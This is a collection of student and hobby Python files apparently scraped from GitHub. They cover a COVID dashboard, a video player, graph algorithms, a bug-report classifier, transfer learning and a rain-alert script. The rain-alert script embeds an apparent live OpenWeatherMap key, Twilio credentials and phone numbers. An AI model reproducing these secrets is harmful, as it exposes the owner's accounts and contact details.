List[str],\n x_axis: str,\n y_axis: str,\n x_scaler: str,\n y_scaler: str,\n min_cases_thresh: str,\n show_labels: str,\n):\n logger.info(corona_table_data[\"Total Cases\"][0])\n corona_table_data[\"Total Cases\"] = corona_table_data[\"Total Cases\"].replace(',', '')\n logger.info(corona_table_data[\"Total Cases\"][0]) \n df = corona_table_data[corona_table_data[\"Total Cases\"].astype(float) > float(min_cases_thresh)]\n names = df[\"Country\"] if show_labels else countries\n colors = list(\n map(lambda x: get_color(x) if x in countries else GRAY, df[\"Country\"])\n )\n data = [\n dict(\n type=\"scatter\",\n y=df[y_axis],\n x=df[x_axis],\n text=names,\n name=df[\"Country\"],\n mode=\"markers+text\",\n textposition=\"top center\",\n showlegend=False,\n marker={\n \"size\": 8,\n \"opacity\": 1,\n \"line\": {\"width\": 0.5, \"color\": \"white\"},\n \"color\": colors,\n },\n )\n ]\n\n layout_scatter = {\n **layout_parent,\n \"title\": f\"{y_axis} vs. {x_axis}\",\n \"xaxis\": {\n \"title\": f\"{x_axis} {title_mapping[x_scaler]}\",\n \"type\": x_scaler,\n \"showspikes\": True,\n \"spikethickness\": 1,\n },\n \"yaxis\": {\n \"title\": f\"{y_axis} {title_mapping[y_scaler]}\",\n \"type\": y_scaler,\n \"showspikes\": True,\n \"spikethickness\": 1,\n },\n \"margin\": {\"l\": 70, \"b\": 70, \"r\": 10, \"t\": 50},\n \"textposition\": \"top center\",\n }\n return dict(data=data, layout=layout_scatter)\n\n\n@app.callback(\n [Output(\"data_table\", \"selected_rows\"), Output(\"data_table\", \"data\")],\n [Input(\"countries\", \"value\")],\n)\ndef update_table_selection_from_country_dropdown(countries: List[str]):\n \"\"\"Update the Data Table selection and sorting, based on the country dropdown.\"\"\"\n\n # move selected countries to top of table\n df = corona_table_data.copy()\n df[\"new\"] = list(range(1, len(df) + 1))\n df.loc[df[df.Country.isin(countries)].index, \"new\"] = 0\n df = df.sort_values([\"new\", \"Total Cases\"], ascending=[True, False])\n df = df.drop(\"new\", axis=1)\n return [\n list(range(len(countries))),\n df.to_dict(\"records\"),\n ]\n\n\n@app.callback(\n dash.dependencies.Output(\"line_graph_view\", \"options\"),\n [dash.dependencies.Input(\"data_source\", \"value\")],\n)\ndef hide_cases_since_dropdowns_if_case_fatalit_set(value: str):\n if value == \"case_fatality\":\n return line_graph.line_graph_view_options[:3]\n else:\n return line_graph.line_graph_view_options\n\n\n@app.callback(\n dash.dependencies.Output(\"date_slider_div\", \"style\"),\n [dash.dependencies.Input(\"line_graph_view\", \"value\")],\n)\ndef hide_date_slider_if_trajectory_not_set(value: str):\n if value == \"trajectory\":\n return {\"display\": \"block\"}\n else:\n return {\"display\": \"none\"}\n\n\n# dynamically create callbacks for each about-info popover we created\ndef _toggle_popover(n, is_open):\n if n:\n return not is_open\n return is_open\n\n\nfor p in registered_popovers:\n app.callback(\n Output(f\"popover-{p}\", \"is_open\"),\n [Input(f\"popover-target-{p}\", \"n_clicks\")],\n [State(f\"popover-{p}\", \"is_open\")],\n )(_toggle_popover)\n\nif __name__ == \"__main__\":\n # app.run_server(debug=True, port=8001)\n app.run_server(debug=True, use_reloader=True)\n","repo_name":"jadhavsujit4/Data-Visualisation-CovidAndStockMarket","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":21570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15342801670","text":"import logging as log\n\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtMultimedia import QMediaPlayer, QMediaContent\nfrom PyQt5.QtMultimediaWidgets import QVideoWidget\nfrom PyQt5.QtWidgets import QSizePolicy, QWidget\n\nfrom Classes.descriptors import FuncDescriptor\nfrom Classes.logging import exp_logger\n\n\nclass VideoPlayer(QVideoWidget):\n onVideoStop = FuncDescriptor()\n onVideoStart = FuncDescriptor()\n onVideoPause = FuncDescriptor()\n\n def __init__(self, parent: QWidget):\n super().__init__(parent=parent)\n self.mediaPlayer = QMediaPlayer(None, QMediaPlayer.VideoSurface)\n self.mediaPlayer.setVideoOutput(self)\n self.mediaPlayer.stateChanged.connect(self.onStateChanged)\n self.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)\n self._video_path = None\n\n @property\n def video_path(self):\n return self._video_path\n\n @video_path.setter\n def video_path(self, value):\n log.debug(\" _video_path set to {}\".format(value))\n self._video_path = value\n self.q_url = QUrl.fromLocalFile(self._video_path)\n self.mediaPlayer.setMedia(QMediaContent(self.q_url))\n\n def showEvent(self, event: QtGui.QShowEvent):\n super().showEvent(event)\n exp_logger.info(f\"Playing video: {self.video_path}\")\n self.mediaPlayer.play()\n\n def onStateChanged(self):\n \"\"\"\n 0 - StoppedState\n 1 - PlayingState\n 2 - PausedState\n \"\"\"\n state = self.mediaPlayer.state()\n if state == 0:\n self.onVideoStop()\n elif state == 1:\n self.onVideoStart()\n elif state == 2:\n self.onVideoPause()\n else:\n raise ValueError(\"Unknown state {}\".format(state))\n\n def closeEvent(self, QCloseEvent):\n super().closeEvent(QCloseEvent)\n log.debug(\"Close {}\".format(self))\n\n","repo_name":"SiegfriedWagner/Matrix-presenter","sub_path":"View/Widgets/videoplayer.py","file_name":"videoplayer.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32160278164","text":"import sys\r\nsys.setrecursionlimit(10**9)\r\ninput = sys.stdin.readline\r\n\r\nn, m, l = map(int,input().split())\r\ngraph = [[] for _ in range(n+1)]\r\nvisited = [0] * (n+1)\r\nfor i in range(m):\r\n u, v = map(int,input().split())\r\n graph[u].append(v)\r\n graph[v].append(u)\r\ncnt = 1\r\n\r\ndef dfs(x):\r\n global cnt\r\n visited[x] = cnt\r\n graph[x].sort()\r\n for i in graph[x]:\r\n if not visited[i]:\r\n cnt += 1\r\n dfs(i)\r\ndfs(l)\r\n\r\nfor i in range(1,n+1):\r\n print(visited[i])\r\n\r\n","repo_name":"wnsgml7267/cote-practice","sub_path":"백준/Silver/24479. 알고리즘 수업 - 깊이 우선 탐색 1/알고리즘 수업 - 깊이 우선 탐색 1.py","file_name":"알고리즘 수업 - 깊이 우선 탐색 1.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12979612275","text":"\"\"\" Natural Language Toolkit - nltk in python\"\"\"\n\n\"\"\" Simple things to do using NLTK\"\"\"\nimport pprint\nimport nltk\nimport json\nimport numpy as np\nimport pandas as pd\nfrom nltk.tokenize import word_tokenize\nfrom pymongo import MongoClient\nfrom nltk.stem import PorterStemmer, SnowballStemmer, LancasterStemmer\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer,CountVectorizer\n\n#Splitting the training and test data \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import accuracy_score\n\n#hstack for concatenating 2 sparse matrix horizontally\nfrom scipy.sparse import hstack\nimport scipy.sparse\n# from nltk.corpus import words\n# nltk.download('stopwords')\n# nltk.download('punkt')\n\nclient = MongoClient(\"localhost\", 27017)\n\nwith open(\"prontos.json\", \"r\") as data_file: \n data = json.load(data_file)\n\ndb = client[\"database_test\"] # creating a database inside the mongodb client\ncollection = db[\"collection_test\"] #then create a new collection in that database\n\n\"\"\" TASK 1\"\"\"\n\ndef desc_tokenize(client:MongoClient):\n db = client[\"database_test\"]\n collection = db[\"collection_test\"]\n elem = collection.find({})# variable with all the elements inside the collection\n tokens_list = [] # creating an empty array for the tokenized data \n for doc in elem: # for every document inside the collection \n # print(doc[\"description\"])\n if isinstance(doc[\"description\"], (str, bytes)): # verify if the 'description' field from the collection is of type \"string or bytes\"\n tokens = word_tokenize(doc[\"description\"]) # used the word_tokenize() method on the ['description'] field to tokenize every words in that field\n collection.update_one({\"_id\": doc[\"_id\"]}, {'$set': {\"tokenized_description\": tokens}}) # here we updated the collection for each string in the 'description' field\n tokens_list.append(tokens) # here we added everything that was tokenized in the empty array we created\n \n return tokens_list \n\ntokens = desc_tokenize(client)\n# print(tokens)\n# We can see the result in the mongosh , using the command : db.collection.find() \n# or to extract one single field we can use the projection : db.collection.find({}\n# {\"description\": 1}) is a projection object that includes only the description field in the query results.\n# # the value 1 in the projection object specifies that the field should be included in the results\n\n\"\"\"TASK 2 :: Apply different stemming methods on the tokens \"\"\"\n\n\"\"\"Method 1\"\"\"\ndef stem_tokens():\n ps = PorterStemmer()\n stems_list = [] # this is a empty list to append all the stemmed data\n db = client[\"database_test\"]\n collection = db[\"collection_test\"]\n stops = set(stopwords.words(\"english\")) # set of english stopwords\n for doc in collection.find({}):\n description = doc['description']\n words = [tok for tok in description.split() if tok.isalpha() and tok.lower() not in stops]\n stem = [ps.stem(tok) for tok in words] \n collection.update_one({\"_id\": doc[\"_id\"]}, {'$set': {'tokenized_description': ' '.join(stem)}})\n # stems_list.append(stem) # the correct one to return the stem list of tokens\n stems_list.append(' '.join(stem))\n return stems_list\n\nstemming = stem_tokens()\n# The output of tokenized_description after stemming without stopwords: '...'\n\"\"\"tokenized_description: 'default templat common templat pleas fill creat pr chang lremov section tempat detail test need specif made fault report custom made ticket perform gnb softwar upgrad \nreleas rf softwar current lte primari link expect gnb sw activ \"\"\"\n\n\n\"\"\"SNOWBALL STEMMING using SnowballStemming()\"\"\"\n\ndef snowball_stemming():\n snowball = SnowballStemmer(language=\"english\")\n stems_list = [] # an empty list to append all the data after stemming\n db = client[\"database_test\"]\n collection = db[\"collection_test\"]\n stops = set(stopwords.words(\"english\")) # set of english stopwords\n for doc in collection.find({}):\n description = doc['description']\n words = [tok for tok in description.split() if tok.isalpha() and tok.lower() not in stops]\n stem = [snowball.stem(tok) for tok in words]\n collection.update_one({\"_id\": doc[\"_id\"]},{'$set': {'tokenized_description_snowball': ' '.join(stem)}})\n stems_list.append(' '.join(stem))\n return stems_list\n \nsnowballStem = snowball_stemming()\n#The output is : \n\ndef lancaster_stemmming():\n lancaster = LancasterStemmer()\n stems_list = [] # an empty list to append all the data after stemming\n db = client[\"database_test\"]\n collection = db[\"collection_test\"]\n stops = set(stopwords.words(\"english\")) # set of english stopwords\n for doc in collection.find({}):\n description = doc['description']\n words = [tok for tok in description.split() if tok.isalpha() and tok.lower() not in stops]\n stem = [lancaster.stem(tok) for tok in words]\n collection.update_one({\"_id\": doc[\"_id\"]},{'$set': {'tokenized_description_lancaster': ' '.join(stem)}})\n stems_list.append(' '.join(stem))\n return stems_list\n\nlancaster = lancaster_stemmming()\n### DE CONTINUAT DIN TASK 2 - sapt 3 : rejoin \n\"\"\"TASK 3 - : Rejoin stemmed tokens and use a TfIdf Vectorizer on the descriptions\"\"\"\n\ndef rejoin_stemmed_words(stemmed_words):\n return [' '.join(words) for words in stemmed_words]\n\n# stemmed_words = stem_tokens() # same as stemming called above \n# joined_words = rejoin_stemmed_words(stemmed_words)\n# print(joined_words)\n\n# tfidf = TfidfVectorizer(tokenizer=stemming, stop_words='english') \n# y = tfidf.fit_transform()\n# print(tfidf.get_features_names_out())\n# print(y.shape())\n\n\n\"\"\" TASK 4 - Applying a Tfidf Vectorizer on the raw text from description field >\"\"\"\ndata_raw = []\nfor doc in collection.find({}):\n data_raw.append(doc['description'])\n\ntfidf_vectorizer = TfidfVectorizer() \ntfidf_raw = tfidf_vectorizer.fit_transform(data_raw)\n# print(\"Raw text:\")\n# print(tfidf_raw.toarray())\n# Initialize the TfidfVectorizer with the desired settings\nvectorizer = TfidfVectorizer()\n# Fit the vectorizer to the list of stemmed descriptions\ntfidf_matrix = vectorizer.fit_transform(snowballStem) # \"stemming\" for Porter Stemmer\n\nprint(tfidf_matrix.shape) # the shape for the tfidf document (for the prontos.json) -- Returns : (2637,5392)\n# tfidf_df = pd.DataFrame(tfidf_matrix.toarray(), columns=vocabulary)\n# print(tfidf_df)\n\nfeature_names = vectorizer.get_feature_names_out()\ntfidf_score = tfidf_matrix.toarray()[0]\n\n# Print the feature names and their corresponding TF-IDF scores if it is a nonzero score in the description \n# for i in range(len(feature_names)):\n# if tfidf_score[i] > 0:\n# print(f\"{feature_names[i]}: {tfidf_score[i]}\")\n\ndef tfidf_scores(stemming):\n vectorizer = TfidfVectorizer()\n tfidf_matrix = vectorizer.fit_transform(lancaster) # this was stemming instead of lancaster\n\n feature_names = vectorizer.get_feature_names_out()\n tfidf_score = tfidf_matrix.toarray()[0]\n\n tfidf_dict = {}\n for i in range(len(feature_names)):\n if tfidf_score[i] > 0 :\n tfidf_dict[feature_names[i]] = tfidf_score[i]\n\n return tfidf_dict\n\n\"\"\" print(tfidf_scores(stemming)) \"\"\"\n\n# Example :Get the vocabulary (i.e. the unique terms in the corpus) and the idf values\n# vocabulary = vectorizer.get_feature_names_out()\n# idf_values = vectorizer.idf_\n# print(\"Vocabulary : \", vocabulary)\n# print(\"IDF values : \" , idf_values)\n\n# TASK WEEK 4\n\"\"\"\"Title and description of a PR should be concatenated and then tokenized, stemmed, etc.\"\"\"\nstop_words = set(stopwords.words('english'))\nporter = PorterStemmer()\nsnowball = SnowballStemmer(language=\"english\")\nlancaster = LancasterStemmer()\ndef tokenize_text(text):\n # Tokenize the text and remove stopwords\n tokens = word_tokenize(text.lower())\n filtered_tokens = [token for token in tokens if token not in stop_words and token.isalpha()]\n return filtered_tokens\n\ndef stem_tokens(tokens):\n # Stem the tokens using PorterStemmer\n stemmed_tokens = [lancaster.stem(token) for token in tokens]\n return stemmed_tokens\n\n\n# for this to get a better accuracy we should go above to the stem_tokens() where we used PorterStemmer and use SnowballStemmer (maybe will improve the accuracy)\ndef concat_full(database_test, collection_test):\n db = client[database_test]\n collection = db[collection_test]\n data = []\n for pr in collection.find():\n pr_text = pr[\"title\"] + \" \" + pr[\"description\"] # concatenate the title and description fields and use tokenize on it and then stemming \n tokens = tokenize_text(pr_text)\n stemmed_tokens = stem_tokens(tokens)\n processed_text = ' '.join(stemmed_tokens)\n data.append({\"_id\": str(pr[\"_id\"]), \"processed_text_v2\" : processed_text})\n collection.update_one({\"_id\": pr[\"_id\"]},{\"$set\": {\"processed_text_v2\": processed_text}})\n \n dict_vectorizer = DictVectorizer()\n sparse_matrix = dict_vectorizer.fit_transform(data)\n # print(sparse_matrix)\n return sparse_matrix.toarray() # Sparse matrix on this concat_full() function\n\ntext_concatenate = concat_full('database_test', 'collection_test')\n# print(text_concatenate)\n\n\"\"\" have to do sparsematrix - on this function ( vectorize) like features_extract()\"\"\"\n\n\"\"\"TASK 2 \"\"\"\n# Turn the other data into useful features for our model (DictVectorizer, OneHotEncoder)\n# Getting from the pronto : 'build' , 'feature' fields for now\n\n# Using DictVectorizer\n\ndef features_extract(database_test, collection_test):\n db = client[database_test]\n collection = db[collection_test]\n\n feature_list = []\n for doc in collection.find():\n features = {} \n features['feature'] = doc.get('feature', '')\n features['build'] = doc.get('build', '')\n feature_list.append(features)\n # print(feature_list) # printing the list of all the features that we wanna see , for example : 'build' & 'feature' from the json file\n dict_vectorizer = DictVectorizer()\n sparse_matrix = dict_vectorizer.fit_transform(feature_list)\n # print(sparse_matrix) # printing the sparse_matrix for each stuff inside the fields\n return sparse_matrix.toarray()\n# , dict_vectorizer.get_feature_names_out()\n\nfeatures = features_extract('database_test', 'collection_test')\n# print(features)\n\n\"\"\"then i have to use train and testset for these 2 functions to get what we need \"\"\"\n\n\n# Concatenate the TFIDF results with the other features extracted\n\n# Turn our categorical groups in charge into numbered fields (LabelEncoder) -- field : groupInCharge --> LabelEncoder()\n\nfrom sklearn.preprocessing import LabelEncoder\ndef encode_groupInCharge(database_test,collection_test, field_name):\n db = client[database_test]\n collection = db[collection_test]\n documents = collection.find({})\n \n # Encode the 'groupInCharge' field using LabelEncoder()\n field = [doc[field_name] for doc in documents]\n encoder = LabelEncoder() \n encoded_labels = encoder.fit_transform(field)\n df = pd.DataFrame({'groupInCharge' : field, 'encoded_labels': encoded_labels})\n # Return the encoded labels as a dataframe to see in detail the encoded_label value for each content in groupInCharge \n return df\n\nencoded_labels = encode_groupInCharge('database_test', 'collection_test', 'groupInCharge')\n# print(encoded_labels)\n\n# Encoding with LabelEncoder for 'state' field ( to have only 2 values ( Closed , Correction Not Needed ) not more than 2 like 'groupInCharge')\n\ndef encode_state(database_test, collection_test, field_name):\n db = client[database_test]\n collection = db[collection_test]\n\n documents = collection.find({})\n\n #Encode 'state' field using LabelEncoder()\n field = [doc[field_name] for doc in documents]\n encoder = LabelEncoder()\n encoded_labels = encoder.fit_transform(field)\n df = pd.DataFrame({'state' : field, 'encoded_labels' : encoded_labels})\n # Return the encoded labels as a dataframe to see in detail the encoded_label value for each content in 'state'\n return df\n\nencoded_label_state = encode_state('database_test', 'collection_test', 'state')\n# print(encoded_label_state)\n\n\n\ndef splitData(database_test, collection_test, test_size=0.2):\n db = client[database_test]\n collection = db[collection_test]\n X = []\n y = []\n for pr in collection.find():\n pr_text = pr['title'] + \" \" + pr['description']\n X.append(pr_text)\n y.append(pr[\"groupInCharge\"])\n\n # Using the CountVectorizer to create a sparse matrix of word counts \n vectorizer = CountVectorizer()\n X_sparse = vectorizer.fit_transform(X) # sparse matrix on the title and description\n # Split the data into training and test sets :\n X_train, X_test, y_train, y_test = train_test_split(X_sparse, y, test_size=test_size, random_state=42)\n # Training using a Decision Tree Classifier:\n clf = DecisionTreeClassifier()\n clf.fit(X_train, y_train)\n # Evaluate the classifier on the test set \n score = clf.score(X_test, y_test)\n print(\"The accuracy is : \", score)\n print(\"Accuracy: {:.2f}%\".format(score * 100))\n return clf\n\nsplitting_data = splitData('database_test', 'collection_test', 0.2)\n\n\n\n\"\"\"WEEK 6\"\"\"\n# Concatenare sparse matrix la cele 2 functii de mai jos cu HSTACK : https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.hstack.html\n\n# Train si test data se poate folosi pe cele 2 matrici concatenate cu ajutorul hstack-ului https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.hstack.html\n# LabelEncoder() pentru valorile ptr BOAM sau NOT BOAM ( MANO ) - o functie separata cu ceva IF is not BOAM == .. s.a.m.d\n# Fill -- numpy.nan_to_num pentru a inlocui valorile lipsa cu ceva default i guess\n\n# Encoding the categoric data from 'groupInCharge' field into labels\ndef label_encodeGIC(database_test,collection_test):\n gic_list = []\n\n cursor = collection.find({})\n for doc in cursor:\n gic = doc['groupInCharge'].split('_', 1)[0] # getting the first word before the '_' in the groupInCharge field\n # print(gic)\n if(gic != 'MANO' or gic !='BOAM'):\n gic_list.append('not_BOAM')\n else: \n if gic == 'MANO':\n gic_list.append('BOAM')\n else:\n gic_list.append(gic)\n label_encoder = LabelEncoder()\n gic_encoded = label_encoder.fit_transform(gic_list)\n # print(gic_encoded)\n return gic_encoded\n\nencodingGIC = label_encodeGIC('database_test','collection_test')\n# print(encodingGIC)\n\n# Concatenare sparse matrixes la cele 2 functii (concat_full(), feature_extract()) cu HSTACK : https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.hstack.html\n\ndef concatenate(database_test, collection_test):\n feature_extract = features_extract(database_test, collection_test) # (2637,2460)\n concat_text = concat_full(database_test, collection_test) # this is (2637, 5273)\n\n print(\"Features_extract : \", feature_extract.shape)\n print(\"Concat_full : \", concat_text.shape)\n\n # Reshape concat_text to have shape (2637, 5273)\n concat_text_reshaped = np.reshape(concat_text, (concat_text.shape[0], concat_text.shape[1])) # reshaping the concat_full() to have the same value with features_extract() for hstacking\n #Convert concat_text_reshaped to a sparse matrix\n concat_text_sparse = scipy.sparse.csr_matrix(concat_text_reshaped)\n\n # Concatenate feature_extract and concat_text_sparse horizontally\n full_concatenate = hstack([feature_extract, concat_text_sparse])\n scipy.sparse.save_npz('sparse_matrix.npz', full_concatenate)\n print(full_concatenate.toarray()) \n print(full_concatenate.shape) # the shape for this concatenate function : (2637,7733)\n return full_concatenate\n\nconcatenated_sparse_matrices = concatenate('database_test','collection_test')\n# print(\"Concatenated Sparse Matrices: \", concatenated_sparse_matrices)\n\n\n\n# DecisionTreeClassifier for this concatenate() function which have 2 sparse matrices concatenated \n\nfrom sklearn.impute import SimpleImputer\ndef train_decision_tree(database_test,collection_test):\n\n\n # Concatenate the sparse matrices\n sparse_matrix = concatenate(database_test, collection_test)\n labels = label_encodeState(database_test, collection_test)\n \n # Split the data into training and testing sets\n X_train, X_test, y_train, y_test = train_test_split(sparse_matrix, labels, test_size=0.2, random_state=42)\n\n # Replace missing values with mean of each feature\n imputer = SimpleImputer(strategy='mean')\n X_train = imputer.fit_transform(X_train)\n X_test = imputer.transform(X_test)\n\n #Train a decision tree classifier : \n clf = DecisionTreeClassifier(random_state=42)\n clf.fit(X_train, y_train)\n\n #Test the model on the testing set\n y_pred = clf.predict(X_test)\n accuracy = accuracy_score(y_test, y_pred)\n print('Accuracy: {:.2f}%'.format(accuracy * 100))\n return clf\n\n\n# clf = train_decision_tree('database_test', 'collection_test')\n\nnp.set_printoptions(threshold=np.inf)\n\n\n# modify this to exclude not_state values but still get a null value for the array\ndef label_encodeState(database_test,collection_test):\n \n state_list = []\n cursor = collection.find({})\n for doc in cursor:\n state = doc['state'] # setting a variable with 'state' field items\n if(state != 'Closed' and state !='Correction Not Needed'):\n state_list.append('Closed')\n else: \n if state == 'Closed':\n state_list.append('Closed')\n else:\n state_list.append('Correction Not Needed')\n # if(state == 'Closed' and state !='Correction Not Needed'):\n # state_list.append('Closed')\n # elif(state == 'Correction Not Needed'):\n # state_list.append('Correction Not Needed')\n\n\n count_nonzero = np.count_nonzero(state_list)\n print(\"Number of non-zero elements in state_list:\", count_nonzero)\n\n # print(state_list)\n label_encoder = LabelEncoder()\n encoded_states = label_encoder.fit_transform(state_list)\n\n # print(encoded_states)\n return encoded_states\n\nencodingState = label_encodeState('database_test','collection_test')\n\n# modify algorithm to get an accuracy more than 70%\n# Using a Naive Bayes Classifier \n\n# from sklearn.naive_bayes import GaussianNB\n# def gaussian_NB(database_test, collection_test):\n# feature_vect = scipy.sparse.load_npz('sparse_matrix.npz').toarray()\n# feature_vect = np.nan_to_num(feature_vect, copy=False, posinf=0.0, neginf=0.0) # values of 0.0\n# target = label_encodeState(database_test, collection_test)\n\n# X_train, X_test, y_train, y_test = train_test_split(feature_vect, target)\n\n \n# if X_train.shape[0] != y_train.shape[0]:\n# raise ValueError(\"Number of samples in X_train and y_train do not match.\")\n\n# naiveBayes = GaussianNB()\n# predict_target = naiveBayes.fit(X_train, y_train).predict(X_test)\n# # print(\"Number of mislabeled points out of a total %d points : %d\" % (X_test.shape[0], (y_test != predict_target).sum()))\n# accuracy = accuracy_score(y_test, predict_target)\n# print('Accuracy: {:.2f}%'.format(accuracy * 100)) # 100% accuracy because is something wrong with label_encodeGIC with MANO AND BOAM , and i can change the target with state field ( closed and CorrectionNotNeeded)\n\nif __name__ == \"__main__\":\n # gaussian_NB('database_test', 'collection_test')\n train_decision_tree('database_test', 'collection_test')\n\nclient.close()","repo_name":"wohljkee/project_dezvoltare","sub_path":"Examples/improve_accuracy.py","file_name":"improve_accuracy.py","file_ext":"py","file_size_in_byte":19749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39459060365","text":"# https://openweathermap.org/api\nimport requests\nfrom twilio.rest import Client\n\napi_key = \"9f00eb6100a05d1257ec6c7a8539adc1\"\nlatitude = 30.158813\nlongitude = -85.660210\n\naccount_sid = \"ACde902588753db3c01b4ed27c002f3ec4\"\nauth_token = \"0992f5f9de1929fe506446dddd073ae9\"\n\n# Walnut Creek lat and long\n# latitude = 37.901760\n# longitude = -122.061920\n\nparameters = {\n \"lat\": latitude,\n \"lon\": longitude,\n \"appid\": api_key,\n \"exclude\": \"current,minutely,daily,alerts\"\n}\n\nresponse = requests.get(url=\"https://api.openweathermap.org/data/2.5/onecall\", params=parameters)\n# https://api.openweathermap.org/data/2.5/onecall?lat={lat}&lon={lon}&exclude={part}&appid={API key}\n# print(response.status_code)\n# print()\nresponse.raise_for_status()\ndata = response.json()\n\ntwelve_days = data[\"hourly\"][0:12]\n\nwill_rain = False\n\nfor day in twelve_days:\n weather_code = day['weather'][0]['id']\n if int(weather_code) < 700:\n will_rain = True\n\nif will_rain:\n client = Client(account_sid, auth_token)\n message = client.messages \\\n .create(\n body=\"It's going to rain today. Remember to bring an ☔️\",\n from_='+16364668733',\n to='+19253307691'\n )\n print(message.status)","repo_name":"btwmendes/100-Days-of-Code","sub_path":"day_35_rain_alert/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71707237992","text":"\"\"\"\nTheorem\nSuppose G = (V , E) is a flow network and f is a flow. The following are equivalent:\nf is a maximum flow in G.\nThe residual network has no augmenting path.\n|f| = C (S, T) for some cut (S, T) of G.\n\nRuntime using a DFS: O(Ef), where E is the number of edges and f is the maximum flow.\nRuntime using a BFS: O(VE^2), where V is the number of vertices.\n\"\"\"\n\n\ndef bfs(graph, source, sink, parent):\n visited = [False] * len(graph)\n queue = [source]\n visited[source] = True\n\n while queue:\n u = queue.pop(0)\n for ind, val in enumerate(graph[u]):\n if not visited[ind] and val > 0:\n queue.append(ind)\n visited[ind] = True\n parent[ind] = u\n\n return visited[sink]\n\n\ndef ford_fulkerson(graph, source, sink):\n parent = [-1] * (len(graph))\n max_flow = 0\n\n while bfs(graph, source, sink, parent):\n path_flow = float(\"Inf\")\n s = sink\n while s != source:\n path_flow = min(path_flow, graph[parent[s]][s])\n s = parent[s]\n\n max_flow += path_flow\n v = sink\n while v != source:\n u = parent[v]\n graph[u][v] -= path_flow\n graph[v][u] += path_flow\n v = parent[v]\n\n return max_flow\n\n\nmatrix = [[0, 4, 0, 0, 0, 0, 0, 8, 0],\n [4, 0, 8, 0, 0, 0, 0, 11, 0],\n [0, 8, 0, 7, 0, 4, 0, 0, 2],\n [0, 0, 7, 0, 9, 14, 0, 0, 0],\n [0, 0, 0, 9, 0, 10, 0, 0, 0],\n [0, 0, 4, 14, 10, 0, 2, 0, 0],\n [0, 0, 0, 0, 0, 2, 0, 1, 6],\n [8, 11, 0, 0, 0, 0, 1, 0, 7],\n [0, 0, 2, 0, 0, 0, 6, 7, 0]]\n\nprint(ford_fulkerson(matrix, 0, 5))\n","repo_name":"anutabutsko/algorithms","sub_path":"src/graph_algorithms/network_flow/ford_fulkerson/ford_fulkerson.py","file_name":"ford_fulkerson.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32716723320","text":"from collections import Counter\n\ndef solution(gems):\n answer = []\n n = len(set(gems))\n left = 0\n counter = Counter()\n for right in range(len(gems)):\n counter[gems[right]] += 1\n right += 1\n while len(counter) == n:\n counter[gems[left]] -= 1\n if counter[gems[left]] == 0:\n del counter[gems[left]]\n left += 1\n answer.append([left, right])\n \n return sorted(answer, key=lambda x: (x[1] - x[0], x[0]))[0]","repo_name":"ohilikeit/Coding_Test_Practice","sub_path":"프로그래머스/lv3/67258. [카카오 인턴] 보석 쇼핑/[카카오 인턴] 보석 쇼핑.py","file_name":"[카카오 인턴] 보석 쇼핑.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10806342539","text":"import keras\nfrom keras.models import Model\nfrom keras.layers import Dense\nfrom keras import optimizers\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.preprocessing import image\n\ntrain_gen = ImageDataGenerator()\ntraining_set = train_gen.flow_from_directory(directory=\"dataset/training_set\",target_size=(224,224))\ntest_gen = ImageDataGenerator()\ntest_set = test_gen.flow_from_directory(directory=\"dataset/test_set\", target_size=(224,224))\n\nfrom keras.applications.vgg16 import VGG16\nvggmodel = VGG16(weights='imagenet', include_top=True)\n\nprint(vggmodel.summary())\n\nfor layers in (vggmodel.layers)[:19]:\n print(layers)\n layers.trainable = False\n\nX= vggmodel.layers[-2].output\npredictions = Dense(2, activation=\"softmax\")(X)\nmodel_final = Model(input = vggmodel.input, output = predictions)\n\nmodel_final.compile(loss = \"categorical_crossentropy\", optimizer = optimizers.SGD(lr=0.0001, momentum=0.9), metrics=[\"accuracy\"])\nprint(model_final.summary())\n\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\ncheckpoint = ModelCheckpoint(\"vgg16_pretrained.h5\", monitor='val_accuracy', verbose=1, save_best_only=True, save_weights_only=False, mode='auto', period=1)\nearly = EarlyStopping(monitor='val_accuracy', min_delta=0, patience=20, verbose=1, mode='auto')\nhist = model_final.fit_generator(generator= training_set, steps_per_epoch= 2, epochs= 100, validation_data= test_set, validation_steps=1, callbacks=[checkpoint,early])\n\nprint(\"pretrained_vgg16_class_indices\", training_set.class_indices)\nf = open(\"pretrained_vgg16_class_indices.txt\", \"w\")\nf.write(str(training_set.class_indices))\nf.close()\n\nimport matplotlib.pyplot as plt\n\nplt.plot(hist.history[\"accuracy\"])\nplt.plot(hist.history['val_accuracy'])\nplt.plot(hist.history['loss'])\nplt.plot(hist.history['val_loss'])\nplt.title(\"model accuracy\")\nplt.ylabel(\"Accuracy\")\nplt.xlabel(\"Epoch\")\nplt.legend([\"Accuracy\",\"Validation Accuracy\",\"loss\",\"Validation 